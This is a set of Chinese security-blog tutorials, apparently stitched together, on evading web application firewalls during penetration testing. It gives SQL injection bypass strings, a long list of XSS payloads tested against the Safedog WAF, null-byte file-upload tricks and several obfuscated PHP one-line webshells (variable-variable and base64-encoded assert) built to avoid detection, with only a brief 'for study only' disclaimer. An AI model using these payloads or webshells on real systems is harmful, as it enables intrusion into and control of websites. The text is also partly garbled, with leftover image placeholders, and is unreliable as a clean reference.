HW 中如何利用 WAF 缺陷进行绕过 在挖洞过程中，往往会遇到各种攻击利用被waf拦截的情况，本文浅析总结了常见的一些绕过思路以及具体实现浅析waf绕过在挖洞过程中，往往会遇到各种攻击利用被waf拦截的情况，本文浅析总结了常见的一些绕过思路以及具体实现利用waf的缺陷绕过1.1利用waf性能缺陷-垃圾字符填充对于通用性较强的软WAF来说，不得不考虑到各种机器和系统的性能，故对于一些超大数据包、超长数据可能会跳过不检测因此可以填充大量垃圾字符来逃避waf对数据包的检测如下1.2利用waf性能缺陷-发送大量请求包可以采取高并发的攻击手段，waf同样出于性能考虑可能会直接放行部分数据包。2.利用waf适配组件的缺陷由于后端web容器、中间件、数据库、脚本语言的多样性，waf很难覆盖全，容易导致waf解析不了而后端可以正常解析读取导致的绕过IIS+asp在IIS+ASP的环境中，如果url中出现了百分号，但后面邻接的字符拼起来后又不在url编码表之内的话，ASP脚本处理时会将其忽略例如假设有如下请求xxx.asp?id=1 union se%lect 1,2,3,4 fro%m adm%inwaf规则不严放行后，后端由于该特性成功处理执行了xxx.asp?id=1 union select 1,2,3,4 from admin导致绕过TOMCATtomcat的特性也可以构造出许多绕过的方式，可以参考https://y4tacker.github.io/2022/06/19/year/2022/6/%E6%8E%A2%E5%AF%BBTomcat%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2%E7%BB%95waf%E6%96%B0%E5%A7%BF%E5%8A%BF/这篇文章1.参数前后添加空白字符绕过filename="1.jsp"的filename字符左右可以加上一些空白字符%20 %09 %0a %0b %0c %0d %1c %1d %1e %1f，比如%20filename%0a="1.jsp"这样导致waf匹配不到我们上传⽂件2.utf-16、cp037等各种编码绕过utf-16cp037（原始payload为' and (7=len(db_name())) and 'a' = 'a）json下的unicode编码3.利用waf适配协议的缺陷3.1畸形请求（与Web应用所处的中间件有关，在部分中间件下不适用）将HTTP请求头变为随机字符串例如xxxxT请求方法后加一个table等空字符使用get请求方法但带上post体（需要服务端能正常接受）3.2分块传输仅仅适用于post传输方法分块传输不少waf现在也都可以识别了，可以结合waf性能缺陷的思路综合利用-延时分块传输具体使用可以参考该项目 http://github.com/c0ny1/chunked-coding-converter3.3非预期请求方式get改为post、Content-Type: application/x-www-form-urlencoded改为multipart/form-data等跳过waf直接访问服务器寻找真实ip绕过云waf云waf通过配置NS或者CNAME记录，使得对网站的请求报文优先经过WAF主机，经过WAF主机过滤之后，将被认为无害的请求报文再送给实际的网站服务器进行请求,此时只要找到服务器的真实ip,修改host为服务器真是ip即可绕过云waf常见寻找真实ip的方式有如下几种1.证书信息查询 https://myssl.com/2.dns历史解析记录3.搜集子域名ip c段(考虑到费用问题，一些子域名并不会部署)4.超级ping......寻找没有部署waf的nginx反代机器当waf在nginx服务器上部署，且存在nginx集群时，可以试试尝试寻找能反代服务却又没用部署waf的机器访问进行绕过以下面这个为例，测试某接口发现被拦截搜集ip信息为xxx.xxx.200.1xx查找c段服务，一个个访问尝试利用成功利用waf白名单WAF存在某些机制，不处理和拦截白名单中的请求数据例如特定的ip,来自于搜索引擎爬虫的访问数据等特定ip可以使用https://github.com/TheKingOfDuck/burpFakeIP插件将xff等头部设置为127.0.0.1等进行绕过尝试搜索引擎爬虫的访问数据User-Agent修改为谷歌搜索引擎等原文链接：https://forum.butian.net/share/3639

【WAF剖析】10种XSS某狗waf绕过姿势 xss 基础：Web安全中的XSS攻击详细教学，Xss-Labs靶场通关全教程（建议收藏）（一）、Web安全中的XSS攻击详细教学（二）--已完结如果懒得找靶场和安全狗防火墙后台回复【靶场】即可获取image-20240722161008610复现网站安全狗最新 v4.0 已经准备好image-20240722104320515这里用 xsslab 进行 waf 绕过测试image-20240722102257861还是一样安全狗 waf 测试http://192.168.209.149/level1.php?name=<script>alert("hellow world")</script>image-20240722102220534基础 payloadphp<?phpecho "<script>alert(1)</script>";?>img<img src=javascript:alert("xss")><IMG SRC=javascript:alert(String.formCharCode(88,83,83))><img scr="URL" style='Xss:expression(alert(xss));'><img src="x" onerror=alert(1)><img src="x" οnerrοr=eval("alert('xss')")><img src=x οnmοuseοver=alert('xss')>css<img STYLE="background-image:url(javascript:alert('XSS'))">formXSS利用方式1<form action=javascript:alert('xss') method="get"><form action=javascript:alert('xss')>XSS利用方式2<form method=post action=aa.asp? οnmοuseοver=prompt('xss')><form method=post action=aa.asp? οnmοuseοver=alert('xss')><form action=1 οnmοuseοver=alert('xss')>input<input name="name" value=""><input value="" οnclick=alert('xss') type="text"><input name="name" value="" οnmοuseοver=prompt('xss') bad=""><input name="name" value=""><script>alert('xss')</script>iframe<iframe src=javascript:alert('xss');height=5width=1000 /><iframe><iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe><!--原code--><iframe src="data:text/html;base64,<script>alert('xss')</script>"><!--base64编码--><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><iframe src="aaa" οnmοuseοver=alert('xss') /><iframe><iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>经过测试以上内容皆执行不了，但是还有一个svg没测试svg！成功了一个，看来 v4.0 的安全狗没有对 svg 进行防护，payload 如下<svg onload=alert(1)>image-20240722103703228常见的 waf 绕过 payload1.大小写绕过<sCript>alert(1)</Script>image-202407221300440002、双写绕过image-202407221309172023、imgimage-202407221309530464、onmouseover 事件当用户鼠标移动时即可运行代码 image-20240722131108228当用户鼠标在这个块上面时即可运行（可以配合 weight 等参数将 div 覆盖页面，鼠标不划过都不行）image-202407221313538565、onclick 事件buttonimage-202407221317099956、onload 事件例如<svg onload=alert(1)>之前已经测试过了，svg 的 onoad 事件可以7、编码脚本绕过关键字image-202407221322232148、主动闭合标签实现注入代码image-202407221341403009、绕过 HTML 注释符image-2024072213461653010、利用换行符绕过image-2024072213474591411、绕过右标签image-2024072213480705012、绕过</内容>image-20240722134857902字典爆破image-20240722135712030这个时候直接一个一个去访问即可image-20240722141703806这里我们找到一个 iframe 的 payload，尝试访问，成功加载，但是看源码，标签没有闭合image-20240722141540870我们在 url 中闭合这个标签，就可以了image-20240722141917556绕过思路一、更改提交方式在默认配置下，为了节省资源，许多 WAF 只会对 GET 请求进行过滤拦截，而忽略了对 POST 请求、Cookie、HTTP Header 等其他提交方式的检测。因此，攻击者可以尝试更改有害语句的提交方式，如将 GET 请求修改为 POST 请求，或者通过 Cookie、HTTP Header 等方式提交恶意脚本，以绕过 WAF 的拦截。二、混淆伪装绕过混淆伪装是一种常见的绕过 WAF 的手段，攻击者通过编码、大小写混淆、双写、转义字符等方式对恶意脚本进行伪装，使其绕过 WAF 的关键词过滤规则。例如，将 JavaScript 代码中的关键字进行大小写混淆（如三、标签和事件函数变换XSS 攻击主要是通过触发 HTML 标签中的事件函数来执行恶意脚本。因此，WAF 会重点识别能够触发事件函数的 HTML 标签和事件函数字段。攻击者可以尝试使用其他可以执行 JavaScript 代码的 HTML 标签（如 , , 等）替换常用的四、利用 WAF 的缺陷和配置不当「增加 WAF 负担」：有些 WAF 在处理大量数据时可能会降低检测精度或放弃检测部分数据包。攻击者可以通过向 WAF 发送大量正常数据包并夹杂异常数据包的方式，增加 WAF 的负担，从而绕过 WAF 的检测。「利用 WAF 配置不当」：WAF 的配置可能存在漏洞或不当之处，如只检测部分参数、忽略某些类型的请求等。攻击者可以通过分析 WAF 的配置规则，构造绕过 WAF 检测的请求。「旁站绕过」：在某些情况下，网站管理员可能只对主站进行了 WAF 防护，而忽略了旁站或子域名的防护。攻击者可以尝试通过旁站或子域名绕过 WAF 的防护。五、使用自动化工具自动化工具如XSStrike 等可以帮助攻击者自动测试 WAF 的防护效果，并生成绕过 WAF 的 payload。这些工具通常包含多种绕过 WAF 的技巧和策略，可以显著提高攻击的成功率。❝XSStrike 开源地址：https://github.com/s0md3v/XSStrike❞六、其他技巧「利用伪协议」：某些 HTML 属性支持伪协议（如javascript: ），攻击者可以利用这些属性执行恶意脚本。「利用 CSS 跨站」：在某些情况下，攻击者可以利用 CSS 中的某些特性（如expression() ）执行 JavaScript 代码。「利用全局变量和函数」：JavaScript 中的全局变量和函数（如eval() , window.onload 等）可以在不直接引用脚本标签的情况下执行代码，攻击者可以尝试利用这些变量和函数绕过 WAF 的防护。七、举例这里我就拿标签事件函数变换来举例、首先判断标签名称，是否可用比如iframe ，它可以正常访问，说明 标签没有进行过滤http://192.168.209.149/level1.php?name=<iframe>image-20240722143819570标签没有进行过滤，尝试闭合这个标签，ok 正常访问image-20240722144155301判断属性 src，好没有过滤image-20240722144230962加了个= 就被拦截了，这时候没法继续了，换个事件试试image-20240722144259675image-20240722144611518这里拿 onload 尝试image-20240722144645731❝需要注意的是，以上绕过 WAF 的思路和技巧仅供学习和研究网络安全使用，不得用于非法攻击和破坏活动。在实际应用中，网站管理员和 WAF 开发者应不断更新和完善 WAF 的防护策略，提高网站的安全性。❞SQL 注入 WAF 绕过文章参考：SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细、sql注入某狗WAF绕过（补充） 

文件上传10种waf绕过姿势 基础篇：https://mp.weixin.qq.com/s/od0djMG4iwO755N2YgDAHg环境搭建首先去官网下载安全狗，进行网站配置，或者后台回复【安全狗】，靶场源码和waf软件都准备好了，都是最新版本的，直接下载就行安全狗配置文件防护规则这里用upload-labs中的第六关进行文件上传测试第六关是在文件后缀添加一个空格就可以上传成功waf环境已搭好WAF绕过基于文件名称的绕过%00截断首先上传一个php文件，抓包文件后面添加;.jpg将;的hex编码替换为00，造成00截断，如下效果知识扩展%00截断是一种在文件上传或URL处理过程中常见的安全绕过技术，它利用了某些编程语言或系统在处理字符串时的一个特性：即当遇到空字符（null character，ASCII码为0，即�或%00在URL编码中）时，会认为字符串已经结束，从而忽略了空字符之后的所有内容。可以看到，虽然绕过了waf还是有代码红色警告没有上传成功，这个时候我们就可以在原来有代码漏洞的情况下，进行绕过，原来代码存在空格绕过，这里我们就用空格进行绕过，添加一个空格上传成功，点击查看源码，就可以看到文件上传的位置（这个图片的位置）多个等号这个操作就更简单了，直接在文件名的位置把一个等于换成多个等于，也能绕过WAF，此时再在末尾加空格，直接成功上传，如下哈哈，没有成功，原文是这样写的，可能已经修复了基于内容拦截绕过此时我们访问，这个php文件被拦截了，这就是基于内容的拦截，像经常使用的一句话木马都会被安全狗绕过[1].畸形传参木马这里要用到hackerbox谷歌插件或者使用火狐浏览器，默认下载不是破解的，我准备好了破解版本，后台私信【hackbox】即可<?php $a = $_GET['x']; $$a = $_GET['y']; $b($_POST['z']);//调用 $b 变量所引用的函数，并将 $_POST['z'] 的值作为参数传递给它。 ?>我们所使用的一句话木马是市面上最为常见的类型，因此几乎所有的WAF（Web应用防火墙）都能识别并拦截这段内容。这正是导致我们上传后无法访问的根本原因。为了验证这一点，你可以尝试开启安全狗的木马扫描功能，看看它是否能被检测出来，从而判断其是否具备免杀能力。上图可以看到并没有检测到，用get方式传如参数x和y，值分别为b和assert ，再用POST方式传如参数z，值为自己想执行的命令[2].经典编码木马通过assert函数的base64编码后的拼接即可绕过，如下：<?php $e=base64_decode("hellow小羽网安"); $e($_POST['aa']); ?>免杀情况我们将中文放在了后面，此时出现拦截我放在前面试试，还是拦截穿插进去，就可以了，不知道是什么原理，php特性、base64编码检测，还是安全狗防护机制，有大佬路过指教一下，谢谢你执行成功上面的绕过方式不可避免都有一些问题，那就是传参时使用了敏感关键字，比如phpinfo()之类的，有一些防火墙就会检测传入的参数是否含有敏感内容(例如宝塔)，那这时候我们怎么办呢？我们可以把传参使用的敏感关键字变成其他编码格式，比如base64，再在一句话木马中对传入的参数先做一个解码操作，如下在木马中添加解码操作<?php $e=base64_decode("YX小羽网安NzZ公众号XJ0"); $e(base64_decode($_POST['aa'])); ?>这个时候我们就可以将phpinfo拿去base64进行加密这个时候就可以执行php代码了，绕过了关键字的检测其他失败案例参考复写失败脏数据绕过失败修改为单引号失败去掉双引号失败.php放到引号的外面上传成功，但是并没有这个php文件查看上传之后的文件，并不是php文件那不加后缀试试，显示文件内容，并没有执行所以使用蚁剑也连接不了数据截断绕过-防匹配(; / 换行)失败参数多次失败总结本教程通过实际搭建环境，展示了文件上传中WAF的多种绕过技巧，包括%00截断、畸形传参木马、经典编码木马等。尽管部分绕过方法因WAF更新而失效，但实验过程揭示了安全机制与绕过技术的博弈。通过不断尝试与创新，攻击者总能找到新的突破点，而防御方则需持续更新策略以应对新威胁。这强调了持续安全监测与加固的重要性。网安学习不迷路，欢迎各位大佬加入讨论